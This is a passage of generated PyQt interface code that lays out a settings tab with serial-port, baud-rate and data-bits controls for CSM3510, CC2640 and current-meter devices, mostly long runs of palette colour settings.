palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.csm3510_head_text.setPalette(palette)
font = QtGui.QFont()
font.setFamily("Microsoft YaHei")
font.setPointSize(16)
self.csm3510_head_text.setFont(font)
self.csm3510_head_text.setLayoutDirection(QtCore.Qt.LeftToRight)
self.csm3510_head_text.setAlignment(QtCore.Qt.AlignCenter)
self.csm3510_head_text.setReadOnly(True)
self.csm3510_head_text.setObjectName("csm3510_head_text")
self.verticalLayout_8.addWidget(self.csm3510_head_text)
self.horizontalLayout_5 = QtWidgets.QHBoxLayout()
self.horizontalLayout_5.setObjectName("horizontalLayout_5")
self.verticalLayout_9 = QtWidgets.QVBoxLayout()
self.verticalLayout_9.setObjectName("verticalLayout_9")
self.lineEdit_16 = QtWidgets.QLineEdit(self.tab_setting)
self.lineEdit_16.setEnabled(False)
self.lineEdit_16.setLayoutDirection(QtCore.Qt.LeftToRight)
self.lineEdit_16.setAlignment(QtCore.Qt.AlignCenter)
self.lineEdit_16.setReadOnly(True)
self.lineEdit_16.setObjectName("lineEdit_16")
self.verticalLayout_9.addWidget(self.lineEdit_16)
self.lineEdit_17 = QtWidgets.QLineEdit(self.tab_setting)
self.lineEdit_17.setEnabled(False)
self.lineEdit_17.setAlignment(QtCore.Qt.AlignCenter)
self.lineEdit_17.setReadOnly(True)
self.lineEdit_17.setObjectName("lineEdit_17")
self.verticalLayout_9.addWidget(self.lineEdit_17)
self.lineEdit_18 = QtWidgets.QLineEdit(self.tab_setting)
self.lineEdit_18.setEnabled(False)
self.lineEdit_18.setAlignment(QtCore.Qt.AlignCenter)
self.lineEdit_18.setReadOnly(True)
self.lineEdit_18.setObjectName("lineEdit_18")
self.verticalLayout_9.addWidget(self.lineEdit_18)
self.btn_csm3510_setting = QtWidgets.QPushButton(self.tab_setting)
self.btn_csm3510_setting.setObjectName("btn_csm3510_setting")
self.verticalLayout_9.addWidget(self.btn_csm3510_setting)
self.horizontalLayout_5.addLayout(self.verticalLayout_9)
self.verticalLayout_10 = QtWidgets.QVBoxLayout()
self.verticalLayout_10.setObjectName("verticalLayout_10")
self.csm3510_comboBox_port = QtWidgets.QComboBox(self.tab_setting)
self.csm3510_comboBox_port.setEditable(True)
self.csm3510_comboBox_port.setObjectName("csm3510_comboBox_port")
self.verticalLayout_10.addWidget(self.csm3510_comboBox_port)
self.csm3510_comboBox_baudrate = QtWidgets.QComboBox(self.tab_setting)
self.csm3510_comboBox_baudrate.setObjectName("csm3510_comboBox_baudrate")
self.verticalLayout_10.addWidget(self.csm3510_comboBox_baudrate)
self.csm3510_comboBox_databits = QtWidgets.QComboBox(self.tab_setting)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.csm3510_comboBox_databits.sizePolicy().hasHeightForWidth())
self.csm3510_comboBox_databits.setSizePolicy(sizePolicy)
self.csm3510_comboBox_databits.setObjectName("csm3510_comboBox_databits")
self.verticalLayout_10.addWidget(self.csm3510_comboBox_databits)
self.btn_csm3510_autodetect = QtWidgets.QPushButton(self.tab_setting)
self.btn_csm3510_autodetect.setObjectName("btn_csm3510_autodetect")
self.verticalLayout_10.addWidget(self.btn_csm3510_autodetect)
self.horizontalLayout_5.addLayout(self.verticalLayout_10)
self.horizontalLayout_5.setStretch(0, 1)
self.horizontalLayout_5.setStretch(1, 1)
self.verticalLayout_8.addLayout(self.horizontalLayout_5)
self.verticalLayout.addLayout(self.verticalLayout_8)
self.verticalLayout_2 = QtWidgets.QVBoxLayout()
self.verticalLayout_2.setContentsMargins(-1, -1, -1, 15)
self.verticalLayout_2.setObjectName("verticalLayout_2")
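# CC2640 block (TI Bluetooth LE chip): same left/right layout as the CSM3510
# block; its header text is tinted dark green (RGB 0, 85, 0).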
self.cc2640_head_text = QtWidgets.QLineEdit(self.tab_setting)
self.cc2640_head_text.setEnabled(False)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 85, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 85, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 85, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 85, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.cc2640_head_text.setPalette(palette)
font = QtGui.QFont()
font.setFamily("Microsoft YaHei")
font.setPointSize(16)
self.cc2640_head_text.setFont(font)
self.cc2640_head_text.setLayoutDirection(QtCore.Qt.LeftToRight)
self.cc2640_head_text.setFrame(True)
self.cc2640_head_text.setAlignment(QtCore.Qt.AlignCenter)
self.cc2640_head_text.setReadOnly(True)
self.cc2640_head_text.setObjectName("cc2640_head_text")
self.verticalLayout_2.addWidget(self.cc2640_head_text)
self.horizontalLayout_3 = QtWidgets.QHBoxLayout()
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
self.verticalLayout_4 = QtWidgets.QVBoxLayout()
self.verticalLayout_4.setObjectName("verticalLayout_4")
self.lineEdit_6 = QtWidgets.QLineEdit(self.tab_setting)
self.lineEdit_6.setEnabled(False)
self.lineEdit_6.setLayoutDirection(QtCore.Qt.LeftToRight)
self.lineEdit_6.setAlignment(QtCore.Qt.AlignCenter)
self.lineEdit_6.setReadOnly(True)
self.lineEdit_6.setObjectName("lineEdit_6")
self.verticalLayout_4.addWidget(self.lineEdit_6)
self.lineEdit_7 = QtWidgets.QLineEdit(self.tab_setting)
self.lineEdit_7.setEnabled(False)
self.lineEdit_7.setAlignment(QtCore.Qt.AlignCenter)
self.lineEdit_7.setReadOnly(True)
self.lineEdit_7.setObjectName("lineEdit_7")
self.verticalLayout_4.addWidget(self.lineEdit_7)
self.lineEdit_8 = QtWidgets.QLineEdit(self.tab_setting)
self.lineEdit_8.setEnabled(False)
self.lineEdit_8.setAlignment(QtCore.Qt.AlignCenter)
self.lineEdit_8.setReadOnly(True)
self.lineEdit_8.setObjectName("lineEdit_8")
self.verticalLayout_4.addWidget(self.lineEdit_8)
self.btn_cc2640_setting = QtWidgets.QPushButton(self.tab_setting)
self.btn_cc2640_setting.setObjectName("btn_cc2640_setting")
self.verticalLayout_4.addWidget(self.btn_cc2640_setting)
self.horizontalLayout_3.addLayout(self.verticalLayout_4)
self.verticalLayout_3 = QtWidgets.QVBoxLayout()
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.cc2640_comboBox_port = QtWidgets.QComboBox(self.tab_setting)
self.cc2640_comboBox_port.setEditable(True)
self.cc2640_comboBox_port.setObjectName("cc2640_comboBox_port")
self.verticalLayout_3.addWidget(self.cc2640_comboBox_port)
self.cc2640_comboBox_baudrate = QtWidgets.QComboBox(self.tab_setting)
self.cc2640_comboBox_baudrate.setObjectName("cc2640_comboBox_baudrate")
self.verticalLayout_3.addWidget(self.cc2640_comboBox_baudrate)
self.cc2640_comboBox_databits = QtWidgets.QComboBox(self.tab_setting)
self.cc2640_comboBox_databits.setObjectName("cc2640_comboBox_databits")
self.verticalLayout_3.addWidget(self.cc2640_comboBox_databits)
self.btn_cc2640_autodetect = QtWidgets.QPushButton(self.tab_setting)
self.btn_cc2640_autodetect.setObjectName("btn_cc2640_autodetect")
self.verticalLayout_3.addWidget(self.btn_cc2640_autodetect)
self.horizontalLayout_3.addLayout(self.verticalLayout_3)
self.horizontalLayout_3.setStretch(0, 1)
self.horizontalLayout_3.setStretch(1, 1)
self.verticalLayout_2.addLayout(self.horizontalLayout_3)
self.verticalLayout.addLayout(self.verticalLayout_2)
self.verticalLayout_5 = QtWidgets.QVBoxLayout()
self.verticalLayout_5.setContentsMargins(-1, -1, -1, 10)
self.verticalLayout_5.setObjectName("verticalLayout_5")
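# "currenter" block (presumably a current-measurement instrument): header
# plus the same port / baud-rate / data-bits controls and auto-detect button.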
self.currenter_head_text = QtWidgets.QLineEdit(self.tab_setting)
self.currenter_head_text.setEnabled(False)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
